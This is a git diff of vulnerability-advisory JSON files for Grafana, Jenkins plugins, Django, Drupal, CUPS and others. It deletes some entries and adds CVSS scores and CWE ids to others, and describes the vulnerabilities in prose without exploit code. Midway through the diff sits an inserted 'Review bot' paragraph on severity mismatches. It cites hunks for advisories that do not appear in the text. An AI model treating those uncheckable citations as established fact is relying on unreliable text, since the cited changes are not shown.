--- a/advisories/unreviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mvpr-q6rh-8vrp",
- "modified": "2022-06-04T00:00:32Z",
- "published": "2022-05-24T17:32:32Z",
- "aliases": [
- "CVE-2020-24303"
- ],
- "details": "Grafana before 7.1.0-beta 1 allows XSS via a query alias for the ElasticSearch datasource.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24303"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grafana/grafana/pull/25401"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#710-beta-1-2020-07-01"
- },
- {
- "type": "WEB",
- "url": "https://security.netapp.com/advisory/ntap-20201123-0002/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-10-28T14:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json b/advisories/unreviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json
deleted file mode 100644
index 606ac11204f5b..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json
+++ /dev/null
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mwqv-jff6-5v62",
- "modified": "2022-05-17T05:47:13Z",
- "published": "2022-05-17T05:47:13Z",
- "aliases": [
- "CVE-2010-3715"
- ],
- "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the RemoveXSS function, and allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (2) the backend.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3715"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/"
- },
- {
- "type": "WEB",
- "url": "http://www.debian.org/security/2010/dsa-2121"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/43786"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-10-25T20:01:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json b/advisories/unreviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json
deleted file mode 100644
index 3d71d51580781..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-p3g4-9xfv-wq9v",
- "modified": "2022-05-14T03:40:05Z",
- "published": "2022-05-14T03:40:05Z",
- "aliases": [
- "CVE-2018-1000058"
- ],
- "details": "Jenkins Pipeline: Supporting APIs Plugin 2.17 and earlier have an arbitrary code execution due to incomplete sandbox protection: Methods related to Java deserialization like readResolve implemented in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000058"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-02-05/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/103034"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-502"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-02-09T23:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json b/advisories/unreviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json
deleted file mode 100644
index 57cae598f548e..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-p498-rpcw-3578",
- "modified": "2022-05-14T03:45:49Z",
- "published": "2022-05-14T03:45:49Z",
- "aliases": [
- "CVE-2018-1000012"
- ],
- "details": "Jenkins Warnings Plugin 4.64 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000012"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-01-22/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-611"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-01-23T14:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json b/advisories/unreviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json
deleted file mode 100644
index d5320461daacc..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json
+++ /dev/null
@@ -1,71 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-p6m5-h7pp-v2x5",
- "modified": "2022-05-02T03:47:43Z",
- "published": "2022-05-02T03:47:43Z",
- "aliases": [
- "CVE-2009-3695"
- ],
- "details": "Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular expression.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3695"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53727"
- },
- {
- "type": "WEB",
- "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=550457"
- },
- {
- "type": "WEB",
- "url": "http://groups.google.com/group/django-users/browse_thread/thread/15df9e45118dfc51/"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/36948"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/36968"
- },
- {
- "type": "WEB",
- "url": "http://www.debian.org/security/2009/dsa-1905"
- },
- {
- "type": "WEB",
- "url": "http://www.djangoproject.com/weblog/2009/oct/09/security/"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2009/10/13/6"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/36655"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2009/2871"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-10-13T10:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json b/advisories/unreviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json
deleted file mode 100644
index 2b1a0e7c91b18..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-p75g-gcv5-42qg",
- "modified": "2022-05-24T17:24:33Z",
- "published": "2022-05-24T17:24:33Z",
- "aliases": [
- "CVE-2020-15899"
- ],
- "details": "Grin 3.0.0 before 4.0.0 has insufficient validation of data related to Mimblewimble.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15899"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-15899.md"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin/compare/v3.1.1...v4.0.0"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-07-28T18:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json b/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json
index ce07431d6b36d..66ebe71f65907 100644
--- a/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json
+++ b/advisories/unreviewed/2022/05/GHSA-p9m6-v44h-ccmx/GHSA-p9m6-v44h-ccmx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p9m6-v44h-ccmx",
- "modified": "2022-05-24T22:00:14Z",
+ "modified": "2024-02-02T03:30:31Z",
 "published": "2022-05-24T22:00:14Z",
 "aliases": [
 "CVE-2019-1010006"
 ],
 "details": "Evince 3.26.0 is affected by buffer overflow. The impact is: DOS / Possible code execution. The component is: backend/tiff/tiff-document.c. The attack vector is: Victin must open a crafted PDF file.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -53,7 +56,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-190"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json b/advisories/unreviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json
deleted file mode 100644
index 9c07478f95220..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-pjmx-4gc6-hwv8/GHSA-pjmx-4gc6-hwv8.json
+++ /dev/null
@@ -1,51 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pjmx-4gc6-hwv8",
- "modified": "2022-05-17T05:48:23Z",
- "published": "2022-05-17T05:48:23Z",
- "aliases": [
- "CVE-2010-3094"
- ],
- "details": "Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.18 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) an action description, (2) an action message, (3) a node, or (4) a taxonomy term, related to the actions feature and the trigger module.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3094"
- },
- {
- "type": "WEB",
- "url": "http://drupal.org/node/880476"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=128418560705305&w=2"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=128440896914512&w=2"
- },
- {
- "type": "WEB",
- "url": "http://www.debian.org/security/2010/dsa-2113"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/42391"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-09-21T20:00:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json b/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json
index fdf210acab23a..a02d302c51f94 100644
--- a/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json
+++ b/advisories/unreviewed/2022/05/GHSA-pmrr-7vvq-vpj6/GHSA-pmrr-7vvq-vpj6.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pmrr-7vvq-vpj6",
- "modified": "2022-05-02T03:17:55Z",
+ "modified": "2024-02-02T18:30:21Z",
 "published": "2022-05-02T03:17:55Z",
 "aliases": [
 "CVE-2009-0749"
 ],
 "details": "Use-after-free vulnerability in the GIFReadNextExtension function in lib/pngxtern/gif/gifread.c in OptiPNG 0.6.2 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a crafted GIF image that causes the realloc function to return a new pointer, which triggers memory corruption when the old pointer is accessed.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -77,7 +80,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json b/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json
index f27b0921d4330..7132777ecad4a 100644
--- a/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json
+++ b/advisories/unreviewed/2022/05/GHSA-pp56-6c5p-hfmv/GHSA-pp56-6c5p-hfmv.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pp56-6c5p-hfmv",
- "modified": "2022-05-17T02:05:47Z",
+ "modified": "2024-02-02T18:30:22Z",
 "published": "2022-05-17T02:05:47Z",
 "aliases": [
 "CVE-2010-2941"
 ],
 "details": "ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate memory for attribute values with invalid string data types, which allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly execute arbitrary code via a crafted IPP request.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -137,7 +140,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
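Review bot: The CVSS v3.1 vector added to GHSA-pp56-6c5p-hfmv, `"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"`, computes to 9.8 (Critical), yet the unchanged `"severity": "HIGH"` two lines below the new `"CWE-416"` in the same `database_specific` object is left as-is, so the file now carries two disagreeing severity signals. If that field is meant to track the qualitative rating of the vector this commit adds it should read `"severity": "CRITICAL"`; if it is derived from another source, that is worth recording in the import tooling, because a consumer reading one field will contradict one reading the other. The same mismatch appears in the sibling hunks for GHSA-q7q8-g4m3-j3pq (vector scores 7.8 High, field says `"MODERATE"`), GHSA-q94h-vc2h-j68g (9.8 Critical vs `"HIGH"`), GHSA-qj88-9fvw-xw2m (6.5 Medium vs `"HIGH"`), GHSA-qvh7-j2x6-25x5 (7.5 High vs `"MODERATE"`) and GHSA-r2g9-49rq-6p4c (7.5 High vs `"MODERATE"`). The enclosing `database_specific` object continues past the end of the hunk.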
diff --git a/advisories/unreviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json b/advisories/unreviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json
deleted file mode 100644
index 7b4f06a158d42..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-pqqj-299w-wf53/GHSA-pqqj-299w-wf53.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pqqj-299w-wf53",
- "modified": "2022-05-24T17:27:18Z",
- "published": "2022-05-24T17:27:18Z",
- "aliases": [
- "CVE-2020-23814"
- ],
- "details": "Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-23814"
- },
- {
- "type": "WEB",
- "url": "https://github.com/xuxueli/xxl-job/issues/1866"
- },
- {
- "type": "WEB",
- "url": "https://www.ccsq8.com/issues.html"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-09-03T17:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json b/advisories/unreviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json
deleted file mode 100644
index 8d992305167e8..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-pqwc-3vhw-qcvq/GHSA-pqwc-3vhw-qcvq.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pqwc-3vhw-qcvq",
- "modified": "2022-05-24T17:37:25Z",
- "published": "2022-05-24T17:37:25Z",
- "aliases": [
- "CVE-2020-28278"
- ],
- "details": "Prototype pollution vulnerability in 'shvl' versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28278"
- },
- {
- "type": "WEB",
- "url": "https://github.com/robinvdvleuten/shvl/blob/bef0a3ebade444cc6b297147ecf5242308f0892e/index.js#L10"
- },
- {
- "type": "WEB",
- "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28278"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "CRITICAL",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-12-29T18:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json b/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json
index 7443c7d22247c..5aed6adb2c217 100644
--- a/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json
+++ b/advisories/unreviewed/2022/05/GHSA-pr96-m2pj-3g36/GHSA-pr96-m2pj-3g36.json
@@ -50,6 +50,10 @@
 "type": "WEB",
 "url": "http://www.debian.org/security/2014/dsa-2939"
 },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8"
+ },
 {
 "type": "WEB",
 "url": "http://www.securitytracker.com/id/1030270"
diff --git a/advisories/unreviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json b/advisories/unreviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json
deleted file mode 100644
index ecf4a4cf5805c..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-pv88-89rq-9fg6/GHSA-pv88-89rq-9fg6.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pv88-89rq-9fg6",
- "modified": "2023-10-25T18:31:25Z",
- "published": "2022-05-24T16:52:46Z",
- "aliases": [
- "CVE-2019-10389"
- ],
- "details": "A missing permission check in Jenkins Relution Enterprise Appstore Publisher Plugin 1.24 and earlier allows attackers to have Jenkins initiate an HTTP connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10389"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1053"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-08-07T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json b/advisories/unreviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json
deleted file mode 100644
index fdfd616c370cb..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-pvjh-7h8q-q56r/GHSA-pvjh-7h8q-q56r.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pvjh-7h8q-q56r",
- "modified": "2022-05-14T02:42:23Z",
- "published": "2022-05-14T02:42:23Z",
- "aliases": [
- "CVE-2010-4312"
- ],
- "details": "The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4312"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/archive/1/514866/100/0/threaded"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-11-26T20:00:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json b/advisories/unreviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json
deleted file mode 100644
index e05f8fc40fa17..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-pwvj-6phx-qv8c/GHSA-pwvj-6phx-qv8c.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pwvj-6phx-qv8c",
- "modified": "2022-05-14T03:45:49Z",
- "published": "2022-05-14T03:45:49Z",
- "aliases": [
- "CVE-2018-1000014"
- ],
- "details": "Jenkins Translation Assistance Plugin 1.15 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to override localized strings displayed to all users on the current Jenkins instance if the victim is a Jenkins administrator.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000014"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-01-22/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/102809"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-01-23T14:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json b/advisories/unreviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json
deleted file mode 100644
index 040f94913cf51..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-px35-882c-47hw/GHSA-px35-882c-47hw.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-px35-882c-47hw",
- "modified": "2023-10-25T18:31:21Z",
- "published": "2022-05-24T22:00:03Z",
- "aliases": [
- "CVE-2019-10326"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attackers to reset warning counts for future builds.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10326"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1391"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/108540"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-05-31T15:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json b/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json
index 530eeb435ef5d..0417037d2ef54 100644
--- a/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json
+++ b/advisories/unreviewed/2022/05/GHSA-q34c-v76q-8jx6/GHSA-q34c-v76q-8jx6.json
@@ -36,7 +36,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-311"
+ "CWE-311",
+ "CWE-614"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json b/advisories/unreviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json
deleted file mode 100644
index ec6b9b7f5eb03..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-q4xc-7cw8-cgfj/GHSA-q4xc-7cw8-cgfj.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-q4xc-7cw8-cgfj",
- "modified": "2022-05-24T17:37:26Z",
- "published": "2022-05-24T17:37:26Z",
- "aliases": [
- "CVE-2020-28277"
- ],
- "details": "Prototype pollution vulnerability in 'dset' versions 1.0.0 through 2.0.1 allows attacker to cause a denial of service and may lead to remote code execution.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28277"
- },
- {
- "type": "WEB",
- "url": "https://github.com/lukeed/dset/blob/50a6ead172d1466a96035eff00f8eb465ccd050a/src/index.js#L6"
- },
- {
- "type": "WEB",
- "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "CRITICAL",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-12-29T17:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json b/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json
index c0333456d0041..431f4f5eed35c 100644
--- a/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json
+++ b/advisories/unreviewed/2022/05/GHSA-q534-42fm-gqr8/GHSA-q534-42fm-gqr8.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q534-42fm-gqr8",
- "modified": "2022-05-01T18:13:08Z",
+ "modified": "2024-02-08T03:32:44Z",
 "published": "2022-05-01T18:13:08Z",
 "aliases": [
 "CVE-2007-3365"
 ],
 "details": "MyServer 0.8.9 and earlier does not properly handle uppercase characters in filename extensions, which allows remote attackers to obtain sensitive information (script source code) via a modified extension, as demonstrated by post.mscgI.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
